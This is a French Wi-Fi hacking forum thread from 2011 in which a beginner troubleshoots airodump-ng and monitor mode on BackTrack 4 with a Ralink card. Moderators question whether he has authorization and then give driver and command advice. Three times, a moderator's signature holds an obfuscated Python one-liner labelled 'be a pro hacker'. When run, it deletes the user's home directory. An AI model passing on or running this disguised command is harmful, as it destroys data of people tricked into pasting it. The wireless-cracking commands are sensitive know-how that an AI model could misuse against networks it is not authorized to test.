Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-10-2011 21:55:34

ours188
Membre
Inscription : 01-10-2011
Messages : 18

probleme airo dump

bonsoir a tous,

Avant de commencer je tien a signaler que j'ais passer pres de 2 heure sur google a regarder les differents tuto ,et differentes video pour trouver une solutions a mon probleme !

Je commence doucement a rentré dans l'univers linux et son invite de commande !
je suis le tuto : http://www.tutofr.com/tutoriaux/tutoria … rcrack.php
et je bloque totalement a l'etape airodump !!

Je suis sous windows 7 et j'utilise Wmware pour lancer backtrap 4 final ,
je rentre la commande iwconfig ,et je detecte mon antenne wifi usb 802.11 raelink ra0
je rentre donc airmon-ng start ra0

et sa me marque bien monitor mode enabled
seulement lorsque je passe a la detection des réseaux avec airodump-ng -- ra0

le conteur tourne mais au bout de 10 min aucun n'est afficher !!!

je ne sais vraiment pas quoi faire ,pourtant il me semble que si mon antenne et passer au mode monitor c'est quelle suporte l'injection non ?

merci de votre aide (et pardonné le noob que je suis !! )

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-10-2011 22:02:19

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : probleme airo dump

Hmm.. Si 'airodump-ng ra0' ne te montre rien de plus que le titre et le temps écoulé, peut-être que tu es à la campagne sans wifi smile
Ou alors dans un batiment trop vaste pour que le WiFi passe d'un bout a l'autre.
Rapproches-toi de ton AP, ce sera plus facile pour ..

*tilt* mon discours est absurde.

Tu ne serais pas entrain de tenter de cracker un réseau WiFi qui ne t'appartient pas ?
(arrêtes-moi tout de suite si je me trompe)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 01-10-2011 22:08:14

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : probleme airo dump

spawn a écrit :

Tu ne serais pas entrain de tenter de cracker un réseau WiFi qui ne t'appartient pas ?
(arrêtes-moi tout de suite si je me trompe)

+1, même si je lui aurais d'abord suggéré de passer son interface en monitor, ça aide roll

Si tu as le droit d'attaquer ce réseau, essaie ceci :

airmon-ng start ra0
airodump-ng mon0

(si ça ne fonctionne pas, donne-nous le modèle exact de ta carte, via la commande "lspci" si elle est interne ou "lsusb" si elle est en USB).

Et si le réseau n'est pas à toi, arrête tes c*nneries avant de te faire dégager d'ici vite fait wink

Hors Ligne

#4 01-10-2011 22:15:49

ours188
Membre
Inscription : 01-10-2011
Messages : 18

Re : probleme airo dump

Et bien je me doutait bien que vous régirait comme sa xd

et bien non ce résaux wifi n'est pas a moi mais a un ami qui ma donné la permission il a une live box que j'arrive a detecté grace a mon antenne (en faite on a fait un paris un peu con a base de biere ) et d'ailleur j'ais la fameuse cle !
je vais essayer vos methodes en tout cas je n'est pas super bien compris le coup de l'interface monitor !

Hors Ligne

#5 01-10-2011 22:24:42

ours188
Membre
Inscription : 01-10-2011
Messages : 18

Re : probleme airo dump

Bon et bien sa na pas marcher
[email protected]:~# airodump-ng mon0
Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device
[email protected]:~# lsusb
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 002: ID 148f:3070 Ralink Technology, Corp. RT2870 Wireless Adapte            r
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

voila ce que j'ais eu .

Hors Ligne

#6 01-10-2011 22:28:05

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : probleme airo dump

Ok. essaye 'airmon-ng start ra0'
(je pense que ta carte a pour nom 'ra0')

[edit : c'est bien ra0 et pas wlan0 --' ]

Dernière modification par spawn (01-10-2011 22:36:42)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#7 01-10-2011 22:33:36

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : probleme airo dump

Si t'es sur BackTrack final, ta carte RT2870 (qui est très probablement une RT3070) ne fonctionnera pas correctement. Il faut que tu passes à BT4-R1, BT5 ou BT5-R1 (de préférence en 32 bits, ça a l'air + stable).

Tant que ta carte s'appelle "ra0", ça veut dire que ton système utilise un ancien pilote, foireux, dont tu ne sauras rien faire...

Hors Ligne

#8 01-10-2011 22:39:08

ours188
Membre
Inscription : 01-10-2011
Messages : 18

Re : probleme airo dump

mmm et bien c'est bizzare en tapant wlan0 sa a trouver ma carte mais sa na pis mode enabled ce pourrait'il que ma carte ne supporte pas l'injection ?  voici le detail de ce que j'ais tenté .

lo        no wireless extensions.

eth0      no wireless extensions.

ra0       RT2870 Wireless  ESSID:""  Nickname:""
          Mode:Auto  Frequency=2.412 GHz
          Link Quality=10/100  Signal level:0 dBm  Noise level:-143 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

[email protected]:~# airmon-ng start wlan0


Interface       Chipset         Driver

ra0             Ralink 2560 PCI rt2500

[email protected]:~# airodump-ng -- wlan0
Interface wlan0:
ioctl(SIOCGIFINDEX) failed: No such device
[email protected]:~# airodump-ng -- ra0
ioctl(SIOCSIWMODE) failed: Network is down

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start ra0 <#>'
Sysfs injection support was not found either.

Hors Ligne

#9 01-10-2011 22:42:44

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : probleme airo dump

ok. il faut faire :
'airmon-ng start ra0'
'airodump-ng ra0'


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#10 01-10-2011 22:57:27

ours188
Membre
Inscription : 01-10-2011
Messages : 18

Re : probleme airo dump

Et bien sa alors ,en faite c sa que j'écrivais mais sa scannait et ne trouvait aucun réseaux j'ais voulu faire une capture d'ecran pour vous montrer le phenomene et la j'ais pinaillé ,ayant fermer wmware j'ais du recommencer ,et la comme par magie sa a marché !!! la j'ais vraiment pas compris en tout cas merci de votre aide !

Hors Ligne

#11 02-10-2011 14:30:56

ours188
Membre
Inscription : 01-10-2011
Messages : 18

Re : probleme airo dump

je crois que j'ais un soucis avec mon antenne en effet ce matin j'ais retenté et la sa ne remarchait plus !!

Ne comprenant pas j ais regardé mon antenne et je me suis rendu comte que sous windows lorsqu'elle recherche des résaux elle clignote d'une led bleue tout le temps alors que la elle clignote toute les 1 ou 2 sec ...

Hors Ligne

#12 02-10-2011 16:52:57

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : probleme airo dump

Au risque de me répéter...

antares145 a écrit :

Si t'es sur BackTrack final, ta carte RT2870 (qui est très probablement une RT3070) ne fonctionnera pas correctement. Il faut que tu passes à BT4-R1, BT5 ou BT5-R1 (de préférence en 32 bits, ça a l'air + stable).

Tant que ta carte s'appelle "ra0", ça veut dire que ton système utilise un ancien pilote, foireux, dont tu ne sauras rien faire...

Contrairement à ce que tu penses, wlan0 n'est pas détectée sur ton système :

[email protected]:~# airmon-ng start wlan0

Interface       Chipset         Driver

ra0             Ralink 2560 PCI rt2500

La preuve que le pilote est foireux, c'est que d'un côté il se présente comme RT2870, de l'autre RT2560...

Fais un essai sous BT5 et vois si ça va mieux (c-à-d si tu as un wlan0 et que la commande "airmon-ng start wlan0" te crée une interface mon0)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
4 210 04-12-2016 16:20:59 par pwerrick
Problème reaver par Antho3674
4 311 15-11-2016 22:05:12 par kcdtv
3 344 14-08-2016 10:22:07 par MiscL
5 736 18-07-2016 23:13:58 par kcdtv
5 1864 13-07-2016 15:56:51 par jaues007

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.094 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]